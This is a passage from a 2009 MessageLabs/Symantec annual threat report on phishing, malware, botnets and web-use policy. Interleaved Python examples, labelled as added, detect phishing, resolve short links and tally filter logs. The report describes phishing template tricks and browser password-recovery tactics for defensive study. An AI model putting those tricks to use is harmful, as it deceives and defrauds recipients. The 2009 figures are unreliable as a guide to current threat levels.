a drive-by attack on a vulnerable web browser or browser plug-in.
Approximately 1 in 405 (0.25%) IMs were found to contain a hyperlink of some form
(excluding disclaimers and other legal text that some organizations are required to append).
By mid-2009 the threat had increased further: 1 in 78 (1.28%) hyperlinks were identified as
website domains that had been used to host malicious content, suggesting that approximately
1 in 80 IM users may have been exposed to a malicious hyperlink sent in an IM each month.
4.7.5. Specialized Malware
By August 17, 2009, the deadline imposed by the Health Information Technology for Economic
and Clinical Health (HITECH) Act, the U.S. Department of Health and Human Services (HHS)
and the Federal Trade Commission (FTC) will synchronize their respective regulations and
issue interim final regulations. The HITECH Act was enacted as part of the American Recovery
and Reinvestment Act of 2009 and imposes notification requirements in the event of security
breaches related to protected health information (PHI).
As millions of government dollars are currently being invested in the digitization and
protection of personal health records, medicine and technology intersect more than ever.
Organizations across the healthcare sector are feeling the pressure to comply with
regulations such as the HITECH Act, and rightfully so.
MessageLabs Intelligence has detected a growing need to safeguard against threats targeting
the healthcare sector. Spam destined for the healthcare sector has risen during 2009 and
levels may rise above 90% in 2010. Email-borne malware attacks against the sector have more
than doubled since the start of 2009. Specialized malware targeting the healthcare sector is
expected to rise in 2010, with attacks intended to focus on stealing personal medical
records.

4.8. Malware Predictions for 2010


4.8.1. Increasingly Specialized Malware in 2010
Highly specialized malware was uncovered¹⁴ in 2009 that was aimed at exploiting certain
ATMs, indicating a degree of insider knowledge about their operation and how they could be
exploited. Expect this trend to continue in 2010, including the possibility of malware target-
ing electronic voting systems, both those used in political elections and public telephone
voting, such as that connected with reality television shows and competitions.

4.8.2. Antivirus is Not Enough


With the rise of polymorphic threats and the explosion of unique malware variants in 2009,
the industry is quickly realizing that traditional approaches to antivirus, both file signatures
and heuristic/behavioral capabilities, are not enough to protect against today’s threats. We
have reached an inflection point where new malicious programs are actually being created
at a higher rate than good programs. As such, we have also reached a point where it no
longer makes sense to focus solely on analyzing malware. Instead, approaches to security
that take all software files into account, such as reputation-based security, will become
key in 2010.

4.8.3. Social Engineering as the Primary Attack Vector


More and more, attackers are going directly after the end user and attempting to trick them
into downloading malware or divulging sensitive information under the guise that they are
doing something perfectly innocent. Social engineering’s popularity is at least in part
spurred by the fact that which operating system and Web browser rests on a user’s computer
is largely irrelevant, as it is the actual user being targeted, not necessarily vulnerabilities
on the machine. Social engineering is already one of the primary attack vectors being used
today, and Symantec estimates that the number of attempted attacks using social engineering
techniques is sure to increase in 2010.

13 Ponemon Institute LLC: “The Ignored Risk of Employees’ Use of Internet Applications”, October 15, 2008
14 https://www.trustwave.com/downloads/spiderlabs/Trustwave-Security-Alert-ATM-Malware-Analysis-Briefing.pdf

4.8.4. Rogue Security Software Vendors Escalate Their Efforts


In 2010, expect to see the propagators of rogue security software scams take their efforts
to the next level, even by hijacking users’ computers, rendering them useless and holding
them for ransom. A less drastic next step, however, would be software that is not explicitly
malicious, but dubious at best. For example, Symantec has already observed some rogue
antivirus vendors selling rebranded copies of free third-party antivirus software as their own
offerings. In these cases, users are technically getting the antivirus software that they pay
for, but the reality is that this same software can actually be downloaded for free elsewhere.

4.8.5. Social Networking Third-Party Applications Will be the Target of Fraud


With the popularity of social networking sites poised for another year of unprecedented
growth, expect to see fraud being leveraged against site users to grow. In the same vein,
expect owners of these sites to create more proactive measures to address these threats.
As this occurs, and as these sites more readily provide third-party developer access to their
APIs, attackers will likely turn to vulnerabilities in third-party applications for users’ social
networking accounts, just as we have seen attackers leverage browser plug-ins more as
Web browsers themselves become more secure.
4.8.6. Fast Flux Botnets Increase
Fast flux is a technique used by some botnets, such as the Storm botnet, to hide phishing
and malicious Web sites behind an ever-changing network of compromised hosts acting as
proxies. Using a combination of peer-to-peer networking, distributed command and control,
web-based load balancing and proxy redirection, it makes it difficult to trace the botnet’s
original geo-location. As industry countermeasures continue to reduce the effectiveness of
traditional botnets, expect to see more botnets using this technique to carry out attacks.

50

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

5. FRAUD, SCAMS AND PHISHING: TOP THREATS OF 2009


5.1. Phishing Summary
In 2009, the proportion of phishing attacks in email traffic was 1 in 325.2 (0.31%) emails,
compared to 1 in 244.9 (0.41%) in 2008. More than 161 billion email phishing attacks were
in circulation in 2009.

5.2. New Techniques, Tactics, Changes etc


In the first half of 2009, the credit crisis generated many new finance-related attacks as
spammers and criminals sought to take advantage of the uncertainty surrounding the global
economic downturn. And throughout the year, phishing activity continued in waves, often
focusing on financial institutions in one particular geography, before moving onto another
target elsewhere. More phishing activity, particularly in the first half of the year, was
linked to the increased availability of phishing kits and the use of compromised, legitimate
domains to host many phishing sites.

2009 Phishing Rate (chart): 1 in 325.2 for 2009 (Jan - Nov); Min February: 1 in 190.4;
Max September: 1 in 437.1. Annual rates for 2005 to 2009 are plotted alongside (values
shown on the chart: 1 in 315.4, 1 in 179.5, 1 in 338.3, 1 in 244.9 for 2008 and 1 in 325.2
for 2009).

At the end of 2008 and in the early months of 2009, phishing may have appeared more
attractive and potentially lucrative to the bad guys, perhaps in part owing to the follow-on
effect of recent disruption of the McColo ISP and partly because of the increased avail-
ability of phishing toolkits online. Some toolkits, such as the ZeuS toolkit fell into the public
domain and became plagued by hidden backdoor Trojans, whereas before it had been the
preserve of cyber criminals who were trading it on the underground economy. Freely avail-
able web hosting services continued to be used to host many phishing websites, and some
providers became better at identifying and responding to this type of abuse.
The ZeuS toolkit can be used to create highly customized botnets, phishing attacks, identity
theft and other malicious activities. Lowering the barrier to entry, many such toolkits became
more widely available, and often they had hidden backdoor Trojans that their new users were
unaware of, enabling other cyber criminals to capitalize on their use.
Phishing activity over the summer months fluctuated more widely; much of the heightened
activity earlier in the year that was linked to phishing toolkits had declined, and fewer
phishing attacks targeted social networking websites. However, over the course of the year
there was a rise in the proportion of phishing attacks in non-English languages, with French
and Italian becoming increasingly popular for these types of attacks. As seen in figure 50,
during the second half of 2009 there was a decline over the summer months in phishing
activity when measured as a proportion of all malware and phishing combined, perhaps as the
availability of phishing toolkits declined, returning to normal levels as the year drew to a
close.

51

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 50: Trend showing phishing as a proportion of malware and phishing combined (chart,
Jun - Nov 2009; vertical axis 0% to 60%)
In figure 51, the chart shows that the most frequently targeted industry is the banking and
finance sector, particularly relating to credit-card fraud.
Figure 51: Industries most frequently targeted in phishing attacks (chart, Jun - Nov 2009;
categories: Bank / Credit Card, Auction / Other Finance, Commerce, Government, Other; the
Bank / Credit Card share ranged from 75% to 92% of attacks across these months)


There was a surge in Government-related phishing in October 2009, owing to large runs of
phishing campaigns related to HMRC in the U.K. and the IRS in the U.S. Phishing as a
proportion of all malware and phishing combined averaged approximately 69.9% for 2009,
and dipped towards the end of the year, accounting for approximately 46% of all malware and
phishing attacks.
The number of individual brands targeted by phishing increased significantly during July
2009, when 702 brands were identified. The average number of brands per month during
the year was 591, and remained fairly stable throughout the latter half of the year.
Since the start of the global credit crisis, there had been a number of phishing and fraud-
related activities particularly related to banks that had received a great deal of publicity
around recent mergers and acquisitions. Many phishing campaigns at the time were seeking
to capitalize on these uncertain times by tailoring their messages around the media cover-
age and news. Consumers may have been more susceptible to these types of scams at a time
when many would not have been surprised to receive messages from unfamiliar banks, and
they may have been more inclined to act on the instructions relating to their own domestic
bank.
In March 2009, a number of mails that claimed to be from the U.K. Border Agency were
identified that were clearly spoofed. The ‘Reply-To:’ header pointed to a free hosted webmail
account and the mail was itself sent from another online webmail provider. It also included
a free U.K. personal redirect telephone number (prefixed with +44 704), a technique often
favored by some phishing and advance-fee fraud scams, which should always arouse
suspicion in an email of this nature. Moreover, this potential scam is quite topical with the
U.K. government planning to introduce a surcharge of £50 GBP for migrant workers on visas.
5.2.1. No Rebate from Phishing with Taxing Demands
The Cutwail botnet was also kept busy in 2009 sending phishing emails relating to tax
rebates, switching between sending huge volumes of IRS (Internal Revenue Service, U.S.)
phishing emails and one of the largest ever HMRC (Her Majesty’s Revenue and Customs, U.K.)
phishing runs. Similar phishing emails purporting to originate from the Australian Tax Office
were also in circulation, masquerading in the same way. In each case the emails were
essentially identical, using the same templates with only the organization name changed.
Part of the recipient’s email address was taken from the To: field and used within the body
of the email: the user name to the left of the @ was inserted into parts of the message to
lend credence to the scam.
Figure 52: Chart showing IRS and HMRC phishing trend (series: IRS phishing as % of all
phishing, HMRC phishing as % of all phishing; Jan 09 - Oct 09; vertical axis 0% to 90%)


Figure 52 illustrates that peaks of activity occurred around the beginning of the tax year
in May and the time when most tax deadlines are set for tax returns to be completed in
October. In the U.S., the IRS extended its limited amnesty program for U.S. taxpayers with
undeclared income on foreign accounts until 15 October, but most tax returns were ex-
pected to be filed by 15 April. In the U.K. and Australia, the deadline was 31 October.
Interceptions of IRS phishing emails peaked on 10 October, accounting for 67% of all
phishing emails in that 24-hour period whilst HMRC phishing emails accounted for 81% of
all phishing interceptions at its peak on 13 October.
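Detection logic for the tax-rebate templates above and the spoofed Border Agency mail earlier in this section, as an added example (not MessageLabs code): it scores one message on whether the recipient's local-part was pasted into the body, whether a named tax authority is claimed by a sender outside that authority's domain, whether Reply-To is diverted to free webmail, and whether a +44 704 redirect number is offered. The brand-to-domain table, the webmail list and both sample messages are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Free webmail domains a tax authority would not use for replies (constructed subset).
FREE_WEBMAIL = {"gmail.com", "yahoo.com", "hotmail.com", "live.com"}

# Brand as it appears in the message -> domain its genuine mail would come from.
# Assumed values for this example; confirm against each authority's own guidance.
TAX_BRANDS = {
    "IRS": "irs.gov",
    "HMRC": "hmrc.gov.uk",
    "Australian Tax Office": "ato.gov.au",
}

# U.K. personal redirect numbers, prefixed +44 704, as noted in the Border Agency scam.
UK_REDIRECT_NUMBER = re.compile(r"\+44\s?704[\d\s]{6,}")


def domain_of(addr):
    """Lower-cased domain part of an address, or '' when there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def phishing_indicators(raw_message):
    """Return the names of the indicators that fire on one text/plain RFC 822 message."""
    msg = message_from_string(raw_message)
    _, to_addr = parseaddr(msg.get("To", ""))
    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    body = "" if msg.is_multipart() else msg.get_payload()
    text = (msg.get("Subject", "") + "\n" + body).lower()
    hits = []

    # 1. Template trick: the recipient's local-part (left of the @) reappears in the body.
    local_part = to_addr.split("@", 1)[0].lower()
    if local_part and re.search(r"\b" + re.escape(local_part) + r"\b", body.lower()):
        hits.append("recipient-localpart-in-body")

    # 2. A tax authority is named, but the sender is not under that authority's domain.
    sender_domain = domain_of(from_addr)
    for brand, brand_domain in TAX_BRANDS.items():
        if re.search(r"\b" + re.escape(brand.lower()) + r"\b", text):
            if sender_domain != brand_domain and not sender_domain.endswith("." + brand_domain):
                hits.append(f"brand-sender-mismatch:{brand}")

    # 3. Replies diverted to a free webmail account.
    if domain_of(reply_addr) in FREE_WEBMAIL:
        hits.append("reply-to-free-webmail")

    # 4. A redirect phone number offered as the contact channel.
    if UK_REDIRECT_NUMBER.search(body):
        hits.append("uk-704-redirect-number")
    return hits


# Constructed sample mirroring the tax-rebate template: local-part in the body,
# HMRC claimed from an unrelated domain, webmail Reply-To, +44 704 number.
SAMPLE_PHISH = """From: "HMRC Refunds" <refunds@example-tax-rebate.net>
To: john.smith@example.com
Reply-To: hmrc.refund.team@gmail.com
Subject: Tax refund notification for john.smith

Dear john.smith,
After the last annual calculations HMRC has determined you are eligible for a tax refund.
Call +44 704 5550 123 or click the link below to claim.
"""

# Constructed benign message for comparison.
SAMPLE_LEGIT = """From: newsletter@example-shop.com
To: john.smith@example.com
Subject: Your order has shipped

Hi John, your order 1234 is on its way.
"""

if __name__ == "__main__":
    print("phish:", phishing_indicators(SAMPLE_PHISH))
    print("legit:", phishing_indicators(SAMPLE_LEGIT))
```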
5.2.2. Phishing and the Value of Compromised Webmail Accounts
Although the Financial sector was often the most common target of phishing attacks, online
services such as web-based email were also popular targets in 2009. One reason for this was
the widespread use of email addresses now being used to authenticate to many different
sites, especially social networking sites, online retailers and auction sites.
People are frequently encouraged to use strong, often difficult to remember, passwords.
And the temptation is sometimes to store these in the browser, which helpfully offers to
remember it for the next time. Although this “auto-fill” information is encrypted before it is
stored, the encryption key is the URL of the webpage itself, so all the attacker would need to
do is make use of the browser history in order to decipher the encrypted passwords. There
are freely available legitimate tools that allow a user to recover forgotten passwords in this
way, and the bad guys are certainly able to utilize similar tactics across botnets, such as
ZeuS.
Once compromised, whether through a phishing attack or harvested from a bot-infected
PC, a web-based email account may be used to reset a password on a number of other sites,
including social networking sites. The password reminder or reset instructions would be
sent to the email address of the account holder, allowing the bad guys access to the
account. Some people share the same email addresses and passwords on many sites, and the
issue here is that it is not just an email account that becomes compromised when someone
divulges those details. Other aspects of a person’s online life may then be susceptible as
well.
Since the widespread reports online and in the media of many users’ webmail account
details ending up in the public domain, the expectation has been to see an increase in spam
emails originating from these accounts. However, MessageLabs Intelligence did not observe
any significant increase in spam originating from the domains identified in these reports.

5.3. Phishing Predictions for 2010


5.3.1. URL Shortening Services Become the Phisher’s Best Friend
Because users often have no idea where a shortened URL is actually sending them, phishers
are able to disguise links that the average security conscious user might think twice about
clicking on. MessageLabs Intelligence is already seeing a trend toward using this tactic to
distribute misleading applications and we expect much more to come. Also, in an attempt to
evade antispam filters through obfuscation, expect spammers to leverage URL shorteners to
carry out their own evil deeds.
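A defender-side resolver for the shortened links discussed in 4.7.1 and here, as an added example (not MessageLabs code): it follows the redirect chain without retrieving the destination page, stops on loops or excessive hops, and judges the final URL rather than the short one. The redirect map, the reputation list and all hostnames are constructed; `fetch_location_live` shows how the same resolver would be fed from a HEAD request and is not called in the offline run.

```python
import urllib.request
from urllib.error import HTTPError
from urllib.parse import urlparse

# Constructed stand-in for the shortener's responses: URL -> Location header (missing = final page).
REDIRECTS = {
    "http://sho.rt/a1": "http://sho.rt/b2",                       # shortener chained to a shortener
    "http://sho.rt/b2": "http://quiz.example-dating-promo.net/go",
    "http://sho.rt/loop": "http://sho.rt/loop2",
    "http://sho.rt/loop2": "http://sho.rt/loop",
    "http://sho.rt/dl": "http://files.example-host.net/update.exe",
}
KNOWN_BAD_HOSTS = {"quiz.example-dating-promo.net"}   # constructed reputation list
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".bat")


def fetch_location_offline(url):
    """Offline fetcher: look the URL up in the constructed redirect map."""
    return REDIRECTS.get(url)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # refuse to follow, so urllib raises HTTPError for 3xx


def fetch_location_live(url, timeout=5):
    """One HEAD request; return the Location header on a 3xx, else None."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        opener.open(req, timeout=timeout)
    except HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.headers.get("Location")
        raise
    return None


def resolve(url, fetch=fetch_location_offline, max_hops=5):
    """Walk the redirect chain; return (chain, status) where status is
    'resolved', 'loop' or 'too-many-hops'."""
    chain = [url]
    for _ in range(max_hops):
        nxt = fetch(chain[-1])
        if nxt is None:
            return chain, "resolved"
        if nxt in chain:
            return chain, "loop"
        chain.append(nxt)
    return chain, "too-many-hops"


def classify(url, fetch=fetch_location_offline):
    """Verdict on the destination: block on loops, excess hops or a bad host,
    warn on a direct executable download (the report notes these need not be
    malicious yet), otherwise allow."""
    chain, status = resolve(url, fetch)
    if status != "resolved":
        return "block:" + status
    final = urlparse(chain[-1])
    host = (final.hostname or "").lower()
    if host in KNOWN_BAD_HOSTS:
        return "block:known-bad-host"
    if final.path.lower().endswith(EXECUTABLE_SUFFIXES):
        return "warn:executable-download"
    return "allow"


if __name__ == "__main__":
    for u in ("http://sho.rt/a1", "http://sho.rt/loop", "http://sho.rt/dl", "http://example.org/about"):
        print(f"{u:28} -> {classify(u)}")
```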

5.4. Advanced-Fee Fraud and the 2010 Soccer World Cup


The 2010 World Cup, taking place in South Africa, had already precipitated a small number
of spam messages relating to the event in late 2009. These were often advance-fee fraud or
419-style scams that required the target to pay a sum of money in advance before receiving
their alleged lottery winnings.

Figure 53: Advance-fee fraud scam relating to the 2010 Soccer World Cup

5.5. Policy-Based Controls and the Enemy Within


The total number of records containing sensitive personal information involved in security
breaches in the U.S. since January 2005 was 341,742,628¹⁵. Although the need to secure
business computer systems and online activities may seem obvious, it can be rather
discomforting when IT budgets are tight, often requiring significant investments of time and
expertise to implement correctly.
One important aspect to this is managing employee behavior, and having the right balance
of acceptable usage policies and technology controls so as not to inhibit the optimal working
environment. This may include awareness raising, education and internal training to ensure
that employees understand their responsibilities online, especially as many organizations
are embracing social networking and micro-blogging services.

15 Privacy Rights Clearinghouse: http://www.privacyrights.org/ar/ChronDataBreaches.htm
Some businesses may operate with a fairly unrestrictive open policy, where access is not
limited, but guidelines are set that govern what is or is not acceptable. Managing the risks
associated with employee Internet usage plays a vital role in any effective IT security policy.
Often the first measures are to undertake a risk assessment in order to clearly identify what
needs safeguarding, why and what happens if it is not protected adequately. This process
will look closely at the most likely risks facing the business and what action needs to be
taken in order to mitigate them.
The risks from exposure to web-based drive-by attacks have been discussed in this report,
as well as the risks from targeted malware, phishing, spear-phishing and other similar
tactics employed by cyber criminals.
Requirements to protect data extend beyond the potential impact from loss of reputation
and customer turnover; they are also needed to meet regulatory and legal demands. Many
countries have enacted data protection legislation, and in the U.S. more than 35 States have
enacted security breach notification laws.
In the U.S., the Health Insurance Portability and Accountability Act (HIPAA) calls for severe
civil and criminal penalties for noncompliance, including fines of up to $25,000 for multiple
violations of the same standard in one calendar year and fines as high as $250,000 and/or
imprisonment for up to ten years for the misuse of health information. Similarly, the Gramm
Leach Bliley Act (GLBA) brings stiff penalties, including civil action brought by the U.S.
Attorney General and fines levied to the organization of up to $100,000.
For any size of business, email is one of the organization’s most critical assets. Not only
do employees need access to their email accounts for their day-to-day jobs, but organiza-
tions must also manage historical copies of email correspondence in order to comply with
regulatory and legal requirements in order to conduct efficient e-discovery if required by
the authorities. It is for these reasons that many more companies are seeking reliable email
archiving solutions.
When used properly, encryption can be a powerful tool to help ensure secure delivery and
access to sensitive information. Unfortunately, just because information is encrypted does
not mean it has been approved to leave your organization. Likewise, sensitive information
that is permitted to exit your organization isn’t always encrypted.
It is important to ensure that any solution employed by the business includes features that
enable the monitoring and prevention of the transmission of data in violation of encryption
policies. It is important to have visibility into and control over encrypted information that
hasn’t been approved for external distribution.
5.5.1. Policy Controls for Web Access
To minimize legal risk and to ensure that the Internet and web access can be used as an
effective business tool, organizations need effective tools for monitoring behavior and to
enforce Acceptable Usage Policies that govern distribution of inappropriate content or to
mandate the use of encryption where appropriate. Such policies will govern how employees
are to conduct themselves online, particularly in the use of social networking, blogging and
micro-blogging websites. The most frequently triggered policy rules can be seen in figure
54, based on the time of day the rule was triggered.
Figure 54: Most frequently blocked policy rules by time of day (local time). Categories
plotted: streaming media, downloads, chat, personals/dating, blogs/forums, adult/sexually
explicit, games; horizontal axis 6 am to 6 pm.
Analysis of policy-based filtering traffic blocked in 2009 reveals the following:


• Ads and Popups account for almost two-thirds (66%) of blocked sites;
• Streaming Media, about one eighth (12.5%) of blocks;
• Games/Chat/Downloads/Social Networking/Blogs/Forums, 1-8%;
• Adult/Sexually Explicit, 1.4%;
• 87.4% of all blocks are made during the working day 8am-6pm;
• 32.6% of all blocks are made during lunchtime 12-2pm;
• Busiest hours by far for blocks are 12-2pm;
• Chat is about four times more popular in the morning, than in the afternoon, especially
late morning. Perhaps users are discussing lunch plans or exchanging stories from the
previous evening’s events;
• Weapons, Adult/Sexually Explicit, Hacking, Games, Violence all have a relatively high
number of blocks outside of normal working hours, compared with other categories. For
example, Adult Sexually Explicit: 68% of blocks within working hours, 32% outside of
working hours. The other four categories mentioned are similarly split;
• Adult/Sexually explicit has a peak of activity around lunchtime like most other categories,
but also a second peak between midnight and 2am;
• Web-based email is consistently flat, users seemingly attempt to visit web-based email
websites at all times during the working day. There is no expected peak during lunchtime
hours;
• News sites show a tremendous burst at lunchtime. This shows that one of the most
popular ways for users to spend their lunch break is catching up on the day’s news;
• There are a number of categories that are very popular during lunchtime periods, such as:
News, Politics, Fashion, Social Networking;
Interestingly, another activity that seems very popular during lunchtime hours is when
users are checking their bank accounts online. Accordingly, a peak in blocks from phishing
and fraud is noted at these times (44% of Phishing/Fraud website blocks occur during
lunchtime).
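The time-of-day breakdown above, recomputed over constructed proxy log lines as an added example (not MessageLabs code): it reports the share of blocks in the working day (8am-6pm) and at lunchtime (12-2pm), the busiest hour, and each category's split inside versus outside working hours. The log format (date, time, user, action, category) is invented for the example, and timestamps are assumed to be local time.

```python
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample of policy-filter events: "date time user action category".
SAMPLE_LOG = """\
2009-11-03 07:45:12 u01 BLOCK chat
2009-11-03 09:10:30 u02 BLOCK streaming-media
2009-11-03 11:20:05 u03 BLOCK chat
2009-11-03 12:05:00 u04 BLOCK news
2009-11-03 12:40:11 u05 BLOCK phishing-fraud
2009-11-03 13:15:42 u02 BLOCK adult-sexually-explicit
2009-11-03 15:20:05 u06 BLOCK games
2009-11-03 16:05:00 u07 ALLOW news
2009-11-03 17:59:59 u01 BLOCK downloads
2009-11-04 01:30:00 u08 BLOCK adult-sexually-explicit
2009-11-04 12:30:00 u09 BLOCK news
2009-11-04 22:10:00 u10 BLOCK games
"""

WORK_START, WORK_END = 8, 18      # working day 8am-6pm, end exclusive
LUNCH_START, LUNCH_END = 12, 14   # lunchtime 12-2pm, end exclusive


def parse_line(line):
    """Split one log line into (timestamp, user, action, category)."""
    day, clock, user, action, category = line.split()
    when = datetime.strptime(f"{day} {clock}", "%Y-%m-%d %H:%M:%S")
    return when, user, action, category


def pct(part, whole):
    """Percentage rounded to one decimal, 0.0 when there is nothing to divide by."""
    return round(100.0 * part / whole, 1) if whole else 0.0


def summarize_blocks(log_text):
    """Aggregate BLOCK events only: working-day share, lunchtime share, busiest
    hour, and per-category (inside, outside) working-hours percentages."""
    hours = Counter()
    per_category = defaultdict(lambda: [0, 0])   # category -> [inside, outside]
    total = work = lunch = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, _, action, category = parse_line(line)
        if action != "BLOCK":
            continue
        total += 1
        h = when.hour
        hours[h] += 1
        inside = WORK_START <= h < WORK_END
        if inside:
            work += 1
        if LUNCH_START <= h < LUNCH_END:
            lunch += 1
        per_category[category][0 if inside else 1] += 1
    busiest_hour = hours.most_common(1)[0][0] if hours else None
    split = {cat: (pct(i, i + o), pct(o, i + o)) for cat, (i, o) in per_category.items()}
    return {
        "total_blocks": total,
        "working_day_pct": pct(work, total),
        "lunchtime_pct": pct(lunch, total),
        "busiest_hour": busiest_hour,
        "category_split": split,
    }


if __name__ == "__main__":
    report = summarize_blocks(SAMPLE_LOG)
    print(f"blocks: {report['total_blocks']}, working day: {report['working_day_pct']}%, "
          f"lunchtime: {report['lunchtime_pct']}%, busiest hour: {report['busiest_hour']}")
    for cat, (inside, outside) in sorted(report["category_split"].items()):
        print(f"  {cat:25} {inside:5.1f}% in hours / {outside:5.1f}% outside")
```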

56

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

6. GLOBAL AND BUSINESS: TOP THREATS OF 2009


6.1. Exposure to Cyber Threats – Likelihood of Joining a Botnet
6.1.1. Broadband Users and Botnet Threats
66% of global bots are found in just 31 countries. The countries with the least risk include
Japan, Belgium and Australia; these all have very few bots considering how many broadband
users they have.
[Figure 55 is a horizontal bar chart (x-axis 0% to 25%) with two series per country: % of global
broadband users and % of global bot PCs. Countries in chart order: Brazil (the only value legible in
the extracted text, 13.9%), United States of America, India, Russia, Vietnam, Poland, China,
Argentina, Romania, Spain, Italy, United Kingdom, Germany, Mexico, France, Czech Republic,
Portugal, Greece, Netherlands, Taiwan, Canada, Japan, Philippines, Australia, Switzerland, Austria,
Sweden, Denmark, Malaysia, Norway, Belgium.]
Figure 55: Chart showing global share of broadband users vs. bots
The countries where broadband users are most likely to become infected with a bot are Vietnam,
Brazil, Romania and Argentina, as seen in Figure 56. Broadband users in the U.K. are 25% more
likely to be infected with botnet malware than those in the U.S. In Germany, broadband users are
33% more likely to become infected than in the U.K., and 70% more likely than users in the
U.S.
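The comparisons above (U.K. vs. U.S., Germany vs. U.K.) are ratios of a country’s share of global bot PCs to its share of global broadband users. The following Python is an added example, not code from the report; every country share and both global totals in it are constructed placeholders, used only to show how the per-user exposure in Figure 56 and the "X% more likely" figures are derived from the shares in Figure 55.

```python
"""Deriving Figure 56 (per-user exposure) from the shares in Figure 55.

Added example, not from the MessageLabs report. All country shares and the
two global totals below are CONSTRUCTED placeholders for illustration.
"""
from typing import Dict, List, Tuple

# Constructed: % of global broadband users and % of global bot PCs per country.
SHARE_BROADBAND: Dict[str, float] = {
    "Brazil": 3.1, "United States": 21.0, "United Kingdom": 4.5,
    "Germany": 5.8, "Japan": 7.2,
}
SHARE_BOTS: Dict[str, float] = {
    "Brazil": 13.9, "United States": 12.5, "United Kingdom": 3.3,
    "Germany": 5.9, "Japan": 1.0,
}
TOTAL_BROADBAND = 430_000_000  # hypothetical global broadband users
TOTAL_BOTS = 5_000_000         # hypothetical global bot PCs


def exposure(country: str) -> float:
    """% of a country's broadband users that host a bot PC (Figure 56's metric)."""
    bots = SHARE_BOTS[country] / 100 * TOTAL_BOTS
    users = SHARE_BROADBAND[country] / 100 * TOTAL_BROADBAND
    return 100 * bots / users


def relative_likelihood(a: str, b: str) -> float:
    """Ratio of infection likelihood for a broadband user in `a` versus one in `b`.

    The global totals cancel out, so a comparison such as "25% more likely"
    needs only the two per-country shares from Figure 55, not absolute counts.
    """
    return (SHARE_BOTS[a] / SHARE_BROADBAND[a]) / (SHARE_BOTS[b] / SHARE_BROADBAND[b])


def ranked_exposure() -> List[Tuple[str, float]]:
    """Countries ordered from highest to lowest per-user exposure, as in Figure 56."""
    rows = [(c, round(exposure(c), 3)) for c in SHARE_BOTS]
    return sorted(rows, key=lambda r: r[1], reverse=True)


if __name__ == "__main__":
    for country, pct in ranked_exposure():
        print(f"{country:<15} {pct:6.3f}% of broadband users have a bot PC")
    uk_vs_us = relative_likelihood("United Kingdom", "United States")
    print(f"a U.K. user is {100 * (uk_vs_us - 1):.0f}% more likely to be infected than a U.S. user")
```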


[Figure 56 is a horizontal bar chart (x-axis 0% to 9%) of one series, % of broadband users with a
bot PC. Countries in chart order: Vietnam, Brazil, Romania, Argentina, Poland, India, Russia, Czech
Republic, Portugal, Greece, Spain, Philippines, Mexico, Italy, United States of America, Austria,
Netherlands, United Kingdom, Taiwan, Switzerland, Malaysia, Denmark, Germany, France, Norway,
Sweden, China, Canada, Australia, Belgium, Japan.]
Figure 56: Chart showing likelihood of broadband users’ exposure to botnet threats


7. CONCLUSIONS
As this report shows, the security landscape in 2009 has been shaped predominantly by
the application of botnets to the criminal enterprise, with an evolutionary step-change
taking place in the malware technology used to establish and control them. The shift
towards using standard web-based HTTP protocols, in some cases even with the manipulation
of social media content, has made it much harder to disrupt these criminal networks, as
evidenced in the report.
The use of generic malware droppers like Bredolab and Conficker to “drop” other software
programs, malware and spyware onto victims’ computers ensures that the bad guys can
remain agile and are able to switch over and adapt their attack vectors and revenue streams
with minimal delay. We have yet to see the full potential of botnets like Conficker, which
kept their cards close to their chest in 2009; it remains to be seen whether their hand will be
played in 2010.
In terms of malware, more variants were intercepted in 2009, a 23% increase in malware
variants year-on-year. Greater levels of sophistication and efficiency brought about larger
numbers of spam campaigns in 2009, with over 21 million different types of spam runs,
more than double the amount seen in 2008.
The global financial crisis presented spammers and fraudsters with huge opportunities for
social engineering scams and enabled them to prey on the naïve and more vulnerable members
of society. World events, festivities and news stories also provided a rich backdrop from
which the spammers and cyber criminals could adapt their themes throughout the year.
Malware and spam in 2009 relied more on the use of the Web than in previous years, as
attacks swung more towards social networking environments, micro-blogging websites
and shortened URLs; compromised websites and account profiles created using CAPTCHA-
breaking technology were all used to host spam or malicious content. Their use in spam
campaigns and malware attacks has been one aspect of this, and the pattern is expected to
continue in 2010, as email will remain the primary social engineering tool for these attacks,
and especially for targeted malware attacks.


Credits
Paul Wood
Executive Editor
MessageLabs Intelligence Senior Analyst, Symantec Hosted Services

Dan Bleaken
Malware Data Analyst, Symantec Hosted Services

Mat Nisbet
Malware Data Analyst, Symantec Hosted Services

Jason Zhang
Malware Analyst, Symantec Hosted Services

Nicholas Johnston
Senior Anti-Spam Engineer, Symantec Hosted Services

Martin Lee
Senior Software Engineer, Symantec Hosted Services

Daren Lewis
Analyst, Symantec Hosted Services

About MessageLabs Intelligence


MessageLabs Intelligence is a respected source of data and analysis for messaging security
issues, trends and statistics. MessageLabs Intelligence provides a range of information on
global security threats based on live data feeds from our control towers around the world
scanning billions of messages each week. All MessageLabs Intelligence reports and analysis
are available at www.messagelabs.com/intelligence

About Symantec
Symantec is a global leader in providing security, storage and systems management
solutions to help consumers and organizations secure and manage their information-driven
world. Our software and services protect against more risks at more points, more completely
and efficiently, enabling confidence wherever information is used or stored. More
information is available at www.symantec.com.
